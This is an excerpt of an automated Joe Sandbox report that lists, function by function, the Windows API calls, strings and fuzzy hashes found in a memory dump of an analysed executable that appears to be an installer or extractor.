• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Window$Long$CallProc
• String ID: $
• API String ID: 513923721-3993045852
• Opcode ID: e46a205e4b90461dd34b47abebcb4d5ac570a5a34bb29431f7cae2412aa812f5
• Instruction ID: 1145412834386629337e6837f4360416b0811ffaf93ef0702bb0c36c8b9f6ed1
• Opcode Fuzzy Hash: e46a205e4b90461dd34b47abebcb4d5ac570a5a34bb29431f7cae2412aa812f5
• Instruction Fuzzy Hash: 2641F271508701AFC720DF1AC884A5BBBF5FF88720F504A1EF5EA876A1D771E8488B51
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph: function at 00CB8330 (graph rendering not reproduced)

APIs
• GetModuleHandleW.KERNEL32(Advapi32.dll,1FC3D414,00000000,?,?,?,00000000,00DA83F0,000000FF), ref: 00CB8373
• GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 00CB839C
• RegCreateKeyExW.KERNEL32(?,00CCA4EF,00000000,00000000,00000000,00DA83F0,00000000,00000000,00DA83F0,1FC3D414,00000000,?,?,?,00000000,00DA83F0), ref: 00CB83E9
• RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,00DA83F0,000000FF), ref: 00CB83FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: AddressCloseCreateHandleModuleProc
• String ID: Advapi32.dll$RegCreateKeyTransactedW
• API String ID: 1765684683-2994018265
• Opcode ID: 8a7a95a236dcf9f700e18e0161a3aaec301cc89214146357e2dfedbcf6bb9183
• Instruction ID: ff128cd9940c39e5c46d52131d90dbbd3aec1c3ea42157ae45434932c69ef6c2
• Opcode Fuzzy Hash: 8a7a95a236dcf9f700e18e0161a3aaec301cc89214146357e2dfedbcf6bb9183
• Instruction Fuzzy Hash: B5318472644215EFEB108F45DC45FABBBACFB08B50F10412AF915E72D0EB71A914CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,00000002), ref: 00CEE410
• GetWindowRect.USER32(00000000,?), ref: 00CEE426
• ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,00CF5F2A,?,?,?,?,?,?), ref: 00CEE43F
• InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,00CF5F2A,?,?), ref: 00CEE44A
• GetDlgItem.USER32(00000000,000003E9), ref: 00CEE45C
• GetWindowRect.USER32(00000000,?), ref: 00CEE472
• SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,?,?,?,00CF5F2A), ref: 00CEE4B5
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Window$Rect$Item$InvalidateShow
• String ID:
• API String ID: 2147159307-0
• Opcode ID: 44f5066f7f2bfb3dd0dfb45878ce3861dbe45c1fc0ff59f6e037fa46542ca18f
• Instruction ID: 2cb79aa0b10172f30405515c3ccd8c412a23668eceb3c7f1f7282354e7834478
• Opcode Fuzzy Hash: 44f5066f7f2bfb3dd0dfb45878ce3861dbe45c1fc0ff59f6e037fa46542ca18f
• Instruction Fuzzy Hash: BF213071618300AFD300DF35DC49A6B7BE9EF8C714F00865AF895D7292E730D9898B56
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNEL32(?,?,?,00000000,1FC3D414,?,?,00000002,?,?,?,?,?,?,00000000,00DEF282), ref: 00CF2427
• GetLastError.KERNEL32(?,00000002), ref: 00CF26B9
• GetLastError.KERNEL32(?,00000002), ref: 00CF2763
• GetLastError.KERNEL32(?,00000002,?,?,?,?,?,?,00000000,00DEF282,000000FF,?,00CF12BA,00000010), ref: 00CF2436
  • Part of subcall function 00CCFDA0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,1FC3D414,?,00000000), ref: 00CCFDEB
  • Part of subcall function 00CCFDA0: GetLastError.KERNEL32(?,00000000), ref: 00CCFDF5
• ReadFile.KERNEL32(?,00000000,00000008,80070057,00000000,?,00000002), ref: 00CF24F8
• ReadFile.KERNEL32(?,1FC3D414,00000000,00000000,00000000,00000001,?,00000002), ref: 00CF2575
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorLast$File$Read$FormatMessagePointer
• String ID:
• API String ID: 3903527278-0
• Opcode ID: 65f1c0e3efeeb595b4c86c7fc48446835c8ef9ce5bbc42b1bfb7abadcad1934d
• Instruction ID: 05b52cc3d560e11a515f63edd47c5264e68963ef8d86745c4b29ec6c86ebbdaa
• Opcode Fuzzy Hash: 65f1c0e3efeeb595b4c86c7fc48446835c8ef9ce5bbc42b1bfb7abadcad1934d
                                                                                                                                                                        • Instruction Fuzzy Hash: 8AD19171D00209DFDB00DFA8C885BADFBB5FF44314F148269E925AB392EB749A05CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
• GetFileVersionInfoSizeW.KERNELBASE(80004005,00DEFE45,1FC3D414,?,?,00000000,?,?,00000000,00DEFE45,000000FF,?,80004005,1FC3D414,?), ref: 00CD70D5
• GetFileVersionInfoW.KERNELBASE(80004005,?,00000000,000000FF,00000000,?,00000000,?,?,00000000,00DEFE45,000000FF,?,80004005,1FC3D414,?), ref: 00CD7123
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: FileInfoVersion$Size
• String ID: ProductName$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
• API String ID: 2104008232-2149928195
• Opcode ID: ab4fdfeffd685e32d4e9d8fbdb14683f2b8824b31af7bdec01840a92f0502ace
• Instruction ID: 8fb60ee6f7cd860720d9f2f944ac429fae0dcd7fbe8d5986d8f5d029bd1f6bf3
• Opcode Fuzzy Hash: ab4fdfeffd685e32d4e9d8fbdb14683f2b8824b31af7bdec01840a92f0502ace
• Instruction Fuzzy Hash: 1C619071905149EFCB14DFA9C849ABEB7F8FF05314F14429AE925A7291EB309E04CBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,1FC3D414,?,00000010,?,00CE9EF0,?), ref: 00CE6556
• SetFilePointer.KERNEL32(00000000,?,00000010,00000000), ref: 00CE659F
• ReadFile.KERNEL32(00000000,1FC3D414,?,?,00000000,00000078,?), ref: 00CE65E1
• FindCloseChangeNotification.KERNEL32(00000000), ref: 00CE665A
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: File$ChangeCloseCreateFindNotificationPointerRead
• String ID: <3
• API String ID: 2405668454-878583566
• Opcode ID: 99b29087e95487a2c821f545a8b2f0458d54e1f32e63ca920df7a54093367c3c
• Instruction ID: a9c78896281710ee389847541a4e4bae041b24aa0ffef7148afcd02ca7517be6
• Opcode Fuzzy Hash: 99b29087e95487a2c821f545a8b2f0458d54e1f32e63ca920df7a54093367c3c
• Instruction Fuzzy Hash: 9851DF70911649AFDB10CBA9CC48BEEFBB8EF54324F148259F421AB2D1D7709E04CB64
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00CD6B40: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,1FC3D414,00000000,00000000,?), ref: 00CD6B95
  • Part of subcall function 00CD6B40: GetTempFileNameW.KERNEL32(00000000,shim_clone,00000000,?), ref: 00CD6C5C
• GetFileVersionInfoSizeW.KERNELBASE(?,000000FF,Shlwapi.dll,1FC3D414,00000000,?,?,00000000,00DE9775,000000FF,Shlwapi.dll,00CD6F16,?,?,?), ref: 00CD6FAD
• GetFileVersionInfoW.KERNELBASE(?,?,?,00000000,00000000,?,?), ref: 00CD6FD9
• GetLastError.KERNEL32(?,?), ref: 00CD701E
• DeleteFileW.KERNEL32(?), ref: 00CD7031
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: File$InfoVersion$DeleteErrorFolderLastNamePathSizeTemp
• String ID: Shlwapi.dll
• API String ID: 1346648681-1687636465
• Opcode ID: 171e544dfb749d6f031e1de46bf7c6984984bdf6320cd09942a0716ae2fcf23c
• Instruction ID: 556699f5f06a71c5b9a127bf9cce8155b6ec77ecad7171edc4ea7a1f473c61f1
• Opcode Fuzzy Hash: 171e544dfb749d6f031e1de46bf7c6984984bdf6320cd09942a0716ae2fcf23c
• Instruction Fuzzy Hash: 16313071905209AFDB10DFA5D944BAFBBB8EF08350F14425BE915A3290EB35AA44CBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(ComCtl32.dll,1FC3D414,?,00000000,00000000), ref: 00CCFF6E
• GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00CCFF91
• FreeLibrary.KERNEL32(00000000), ref: 00CD000F
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: ComCtl32.dll$LoadIconMetric
• API String ID: 145871493-764666640
• Opcode ID: d2d33854e3ca68901f073d9f2bc4d6763dc2a427cfa9caeba2c81f59381e6f03
• Instruction ID: 7784ea463d6cc1b50d278c91c804b6691c318769561d523b3c4758974e9cd12a
• Opcode Fuzzy Hash: d2d33854e3ca68901f073d9f2bc4d6763dc2a427cfa9caeba2c81f59381e6f03
• Instruction Fuzzy Hash: 8F318471900255AFDB108F95DC44BAFBFF8EB49750F14412EF915B3281D7759A04CB90
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • MsgWaitForMultipleObjectsEx.USER32(00000001,00000000,000000FF,000005FF,00000004), ref: 00CCD801
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000), ref: 00CCD847
                                                                                                                                                                        • TranslateMessage.USER32(00000000), ref: 00CCD852
                                                                                                                                                                        • DispatchMessageW.USER32(00000000), ref: 00CCD859
                                                                                                                                                                        • MsgWaitForMultipleObjectsEx.USER32(00000001,?,000000FF,000005FF,00000004), ref: 00CCD86B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Message$MultipleObjectsWait$DispatchPeekTranslate
• String ID:
• API String ID: 4084795276-0
• Opcode ID: ebb8d6badbdf55ef17337af13861f67dd41ad1cd25dbac7a92c7bffc51fd5000
• Instruction ID: d19ad1977fcdf23115a7f14f08dfd3fa2bb0b261252a5db6e2d212733f46313d
• Opcode Fuzzy Hash: ebb8d6badbdf55ef17337af13861f67dd41ad1cd25dbac7a92c7bffc51fd5000
• Instruction Fuzzy Hash: 4F1136716483056AE610CB51DC81FA6B3DCEB89B74F40023BFA10E21C0E630E9498B61
Uniqueness

Uniqueness Score: -1.00%

APIs
• PathIsUNCW.SHLWAPI(?,1FC3D414,?,00000010,?), ref: 00CEF1AA
  • Part of subcall function 00CCE790: GetCurrentProcess.KERNEL32 ref: 00CCE7D8
  • Part of subcall function 00CCE790: OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00CCE7E5
  • Part of subcall function 00CCE790: GetLastError.KERNEL32 ref: 00CCE7EF
  • Part of subcall function 00CCE790: FindCloseChangeNotification.KERNEL32(00000000), ref: 00CCE8D0
  • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
  • Part of subcall function 00BBA140: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA163
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Process$FindInit_thread_footer$ChangeCloseCurrentErrorHeapLastNotificationOpenPathResourceToken
• String ID: Extraction path set to:$[WindowsVolume]$\\?\
• API String ID: 2914359614-3538578949
• Opcode ID: 79a9acdd79ae36e50145d83fa2aac2fb3c36899eb440befb0807b1bf5312aa4b
• Instruction ID: 21823657539924bea342d18d3d9e1ef4fe738687db206cd284ea42ee6d43a484
• Opcode Fuzzy Hash: 79a9acdd79ae36e50145d83fa2aac2fb3c36899eb440befb0807b1bf5312aa4b
• Instruction Fuzzy Hash: EBC1D4309006499FDB10DFADC884BAEF7F4AF45314F1482ADE925AB292DB709E01CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00CE67F0: GetTickCount.KERNEL32 ref: 00CE6874
  • Part of subcall function 00CE67F0: __Xtime_get_ticks.LIBCPMT ref: 00CE687C
  • Part of subcall function 00CE67F0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CE68C6
  • Part of subcall function 00D0AC30: GetUserNameW.ADVAPI32(?,?), ref: 00D0ACC5
  • Part of subcall function 00D0AC30: GetLastError.KERNEL32 ref: 00D0ACCB
  • Part of subcall function 00D0AC30: GetUserNameW.ADVAPI32(?,?), ref: 00D0AD13
  • Part of subcall function 00D0AC30: GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 00D0AD49
  • Part of subcall function 00D0AC30: GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,00000000,00000000), ref: 00D0AD93
• __Init_thread_footer.LIBCMT ref: 00CE6AB1
• GetCurrentProcess.KERNEL32(00000008,?,1FC3D414), ref: 00CE6CA8
• OpenProcessToken.ADVAPI32(00000000), ref: 00CE6CAF
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: EnvironmentNameProcessUserVariable$CountCurrentErrorInit_thread_footerLastOpenTickTokenUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
• String ID: \/:*?"<>|
• API String ID: 1521599615-3830478854
• Opcode ID: eae172d4179cb625303db18c7343c1367e0c27dd670539e222f390e0a45af76e
• Instruction ID: 555f109c32129d4cea67165f5d3348a6c1d34cc169b1d0bb72ac037092b07031
• Opcode Fuzzy Hash: eae172d4179cb625303db18c7343c1367e0c27dd670539e222f390e0a45af76e
• Instruction Fuzzy Hash: D6B1DC71D00248CFDB14DFA9C8457EEBBB4EF14304F24826DE415AB292EB746E49CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00D20324,40000000,00000001,00000000,00000002,00000080,00000000,1FC3D414,?,00000001), ref: 00D1F342
• WriteFile.KERNEL32(00000000,0000C800,0000C800,0000C800,00000000,?,0000C800), ref: 00D1F3D8
• CloseHandle.KERNEL32(00000000,?,0000C800), ref: 00D1F44C
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID: <3
• API String ID: 1065093856-878583566
• Opcode ID: 171c13842049a42c24222381b06bccbc19cf1c58314871e04760780f0a995b23
• Instruction ID: 2332c77539337e35b0934f44d174ecb829261da64d399e9b6dcf1e5c61d09f77
• Opcode Fuzzy Hash: 171c13842049a42c24222381b06bccbc19cf1c58314871e04760780f0a995b23
• Instruction Fuzzy Hash: 71518E71A10218AFDF10DFA9ED45BEEBBB9FF48310F144269F810B7290DB7599448BA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadStringW.USER32(?,00000000,?,00000100), ref: 00CD4C0C
• LoadStringW.USER32(?,00000000,?,00000001), ref: 00CD4CA0
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: LoadString
• String ID:
• API String ID: 2948472770-0
• Opcode ID: 1575b6a88fccef9ab4a7fbb8eb912d2db065cdee76a77cb574e1e924577a6808
• Instruction ID: d37246da76a2afa81840586d3670c69d42371f810b70c9d1b6b006f6dd5bcc02
• Opcode Fuzzy Hash: 1575b6a88fccef9ab4a7fbb8eb912d2db065cdee76a77cb574e1e924577a6808
• Instruction Fuzzy Hash: C3B17E71D11208AFDB04DFA8D945BEDBBB5FF48300F10822AEA15A7390EB746A45CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
• PathIsUNCW.SHLWAPI(?,?), ref: 00CCCD26
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Init_thread_footer$HeapPathProcess
• String ID: \\?\$\\?\UNC\
• API String ID: 806983814-3019864461
• Opcode ID: fd935633b1e77abf78924d6151f213bae8a6b34156dddc357f98f438a04b0bbd
• Instruction ID: 7956195101869b83a37674d2b37ae8da8649678f130089431b51d744b51ace79
• Opcode Fuzzy Hash: fd935633b1e77abf78924d6151f213bae8a6b34156dddc357f98f438a04b0bbd
• Instruction Fuzzy Hash: 73C16E7190060A9FDB00DBA9C885FAEF7F9FF45314F14826DE425E7291EB749A05CBA0
Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
• IsWindow.USER32(00000000), ref: 00D12091
• EndDialog.USER32(00000000,00000001), ref: 00D120A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: DialogWindow
• String ID: |^
• API String ID: 2634769047-2783013017
• Opcode ID: 7378b1915c6cf18a26ef844d918e2ed1a219d06ead9584f32df051a48a6c13e0
• Instruction ID: ec25cefa678a972ea87cbff29223178ae9bc7c420905b74a0c06bc192a06318e
• Opcode Fuzzy Hash: 7378b1915c6cf18a26ef844d918e2ed1a219d06ead9584f32df051a48a6c13e0
• Instruction Fuzzy Hash: E1518D30901745EFD711CF68C948B9AFBF4FF49310F14869DE4459B2A1DB71AA44CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000008,00000008,00000000,00CF5F3E,?,?,?,?,?,?), ref: 00D7FA18
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D7FA1F
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00D7FA65
• HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D7FA6C
  • Part of subcall function 00D7F8B1: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F8D5
  • Part of subcall function 00D7F8B1: HeapAlloc.KERNEL32(00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F8DC
Memory Dump Source
